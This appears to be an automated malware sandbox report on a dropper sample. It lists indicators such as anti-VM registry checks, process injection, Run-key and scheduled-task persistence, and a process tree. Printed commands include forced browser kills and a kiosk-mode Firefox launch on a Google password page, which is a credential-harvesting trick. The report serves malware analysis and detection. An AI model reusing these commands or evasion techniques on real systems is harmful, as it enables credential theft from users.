\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YMci4Rc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NLHQOm0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 84e276d43c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NLHQOm0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cd0ec7b16a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4c1447ebef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2b1895.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1M25d5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NLHQOm0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YMci4Rc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3H13t.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YMci4Rc.exe -
Checks processor information in registry 2 TTPs 17 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3H13t.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3H13t.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 4816cf3cfa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 4816cf3cfa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 904 timeout.exe -
Enumerates system info in registry 2 TTPs 11 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 74 Go-http-client/1.1 HTTP User-Agent header 310 Go-http-client/1.1 -
Kills process with taskkill 5 IoCs
pid Process 5100 taskkill.exe 4296 taskkill.exe 1948 taskkill.exe 3504 taskkill.exe 3336 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133844633448262800" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2152 schtasks.exe 5512 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1924 1M25d5.exe 1924 1M25d5.exe 1544 skotes.exe 1544 skotes.exe 4296 2b1895.exe 4296 2b1895.exe 4296 2b1895.exe 4296 2b1895.exe 4296 2b1895.exe 4296 2b1895.exe 3092 3H13t.exe 3092 3H13t.exe 3092 3H13t.exe 3092 3H13t.exe 1404 skotes.exe 1404 skotes.exe 3092 3H13t.exe 3092 3H13t.exe 384 chrome.exe 384 chrome.exe 3092 3H13t.exe 3092 3H13t.exe 3092 3H13t.exe 3092 3H13t.exe 1376 msedge.exe 1376 msedge.exe 3760 msedge.exe 3760 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1832 YMci4Rc.exe 1832 YMci4Rc.exe 1832 YMci4Rc.exe 1832 YMci4Rc.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 4840 NL58452.exe 4840 NL58452.exe 4840 NL58452.exe 4840 NL58452.exe 3092 3H13t.exe 3092 3H13t.exe 2508 NLHQOm0.exe 2508 NLHQOm0.exe 2508 NLHQOm0.exe 2508 NLHQOm0.exe 2952 9aiiMOQ.exe 2952 9aiiMOQ.exe 2952 9aiiMOQ.exe 2952 9aiiMOQ.exe 1048 fher.exe 1048 fher.exe 1048 fher.exe 1048 fher.exe 3004 yOO5EOR.exe 3004 yOO5EOR.exe 3004 yOO5EOR.exe 4280 yOO5EOR.exe 4280 yOO5EOR.exe 4280 yOO5EOR.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 384 chrome.exe 384 chrome.exe 384 chrome.exe 3760 msedge.exe 3760 msedge.exe 5168 chrome.exe 5168 chrome.exe 5168 chrome.exe 5168 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeDebugPrivilege 1948 taskkill.exe Token: SeDebugPrivilege 3004 yOO5EOR.exe Token: SeDebugPrivilege 4912 DotStealerBuild.exe Token: SeDebugPrivilege 4280 yOO5EOR.exe Token: SeDebugPrivilege 3504 taskkill.exe Token: SeDebugPrivilege 3336 taskkill.exe Token: SeDebugPrivilege 5100 taskkill.exe Token: SeDebugPrivilege 4296 taskkill.exe Token: SeDebugPrivilege 2384 firefox.exe Token: SeDebugPrivilege 2384 firefox.exe Token: SeDebugPrivilege 5836 powershell.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeDebugPrivilege 7028 powershell.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeDebugPrivilege 1168 C3hYpvm.exe Token: SeDebugPrivilege 5328 powershell.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe Token: SeShutdownPrivilege 5752 chrome.exe Token: SeCreatePagefilePrivilege 5752 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 3760 msedge.exe 556 0874a5f937.exe 556 0874a5f937.exe 556 0874a5f937.exe 556 0874a5f937.exe 556 0874a5f937.exe 556 0874a5f937.exe 556 0874a5f937.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe -
Suspicious use of SendNotifyMessage 34 IoCs
pid Process 556 0874a5f937.exe 556 0874a5f937.exe 556 0874a5f937.exe 556 0874a5f937.exe 556 0874a5f937.exe 556 0874a5f937.exe 556 0874a5f937.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 556 0874a5f937.exe 556 0874a5f937.exe 556 0874a5f937.exe 556 0874a5f937.exe 5808 cd0ec7b16a.exe 5808 cd0ec7b16a.exe 5808 cd0ec7b16a.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2384 firefox.exe 1168 C3hYpvm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4888 wrote to memory of 1516 4888 c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe 88 PID 4888 wrote to memory of 1516 4888 c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe 88 PID 4888 wrote to memory of 1516 4888 c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe 88 PID 1516 wrote to memory of 1924 1516 x8b75.exe 89 PID 1516 wrote to memory of 1924 1516 x8b75.exe 89 PID 1516 wrote to memory of 1924 1516 x8b75.exe 89 PID 1924 wrote to memory of 1544 1924 1M25d5.exe 90 PID 1924 wrote to memory of 1544 1924 1M25d5.exe 90 PID 1924 wrote to memory of 1544 1924 1M25d5.exe 90 PID 1516 wrote to memory of 4296 1516 x8b75.exe 91 PID 1516 wrote to memory of 4296 1516 x8b75.exe 91 PID 1516 wrote to memory of 4296 1516 x8b75.exe 91 PID 4888 wrote to memory of 3092 4888 c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe 94 PID 4888 wrote to memory of 3092 4888 c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe 94 PID 4888 wrote to memory of 3092 4888 c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe 94 PID 3092 wrote to memory of 384 3092 3H13t.exe 96 PID 3092 wrote to memory of 384 3092 3H13t.exe 96 PID 384 wrote to memory of 2936 384 chrome.exe 97 PID 384 wrote to memory of 2936 384 chrome.exe 97 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 2664 384 chrome.exe 98 PID 384 wrote to memory of 1160 384 chrome.exe 99 PID 384 wrote to memory of 1160 384 chrome.exe 99 PID 384 wrote to memory of 3772 384 chrome.exe 100 PID 384 wrote to memory of 3772 384 chrome.exe 100 PID 384 wrote to memory of 3772 384 chrome.exe 100 PID 384 wrote to memory of 3772 384 chrome.exe 100 PID 384 wrote to memory of 3772 384 chrome.exe 100 PID 384 wrote to memory of 3772 384 chrome.exe 100 PID 384 wrote to memory of 3772 384 chrome.exe 100 PID 384 wrote to memory of 3772 384 chrome.exe 100 PID 384 wrote to memory of 3772 384 chrome.exe 100 PID 384 wrote to memory of 3772 384 chrome.exe 100 PID 384 wrote to memory of 3772 384 chrome.exe 100 PID 384 wrote to memory of 3772 384 chrome.exe 100 PID 384 wrote to memory of 3772 384 chrome.exe 100 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe"C:\Users\Admin\AppData\Local\Temp\c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x8b75.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x8b75.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1M25d5.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1M25d5.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1544 -
C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"5⤵
- Executes dropped EXE
PID:2044
-
-
C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3068 -
C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 9606⤵
- Program crash
PID:4524
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2264 -
C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 9606⤵
- Program crash
PID:2680
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4840
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 9606⤵
- Program crash
PID:2268
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087664001\NLHQOm0.exe"C:\Users\Admin\AppData\Local\Temp\1087664001\NLHQOm0.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4212 -
C:\Users\Admin\AppData\Local\Temp\1087664001\NLHQOm0.exe"C:\Users\Admin\AppData\Local\Temp\1087664001\NLHQOm0.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 9646⤵
- Program crash
PID:3824
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087739001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1087739001\amnew.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5068 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"6⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4344 -
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1048
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 9608⤵
- Program crash
PID:3260
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008690101\0874a5f937.exe"C:\Users\Admin\AppData\Local\Temp\10008690101\0874a5f937.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:556 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3504
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking8⤵PID:1568
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking9⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2384 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1952 -prefMapHandle 1944 -prefsLen 27412 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a0ef11e-8878-41e1-98a6-67af85d27de3} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" gpu10⤵PID:2292
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2508 -parentBuildID 20240401114208 -prefsHandle 2500 -prefMapHandle 2496 -prefsLen 28332 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e99a7f38-aa96-4ae2-b512-47fa45b009c7} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" socket10⤵PID:1948
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2888 -childID 1 -isForBrowser -prefsHandle 2844 -prefMapHandle 3024 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6dfa399-bff5-4776-9d44-53b61a367dc9} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" tab10⤵PID:1292
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3744 -childID 2 -isForBrowser -prefsHandle 3740 -prefMapHandle 2880 -prefsLen 32822 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd306d90-0058-453e-bff0-e6b00c3268ca} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" tab10⤵PID:1648
-
-
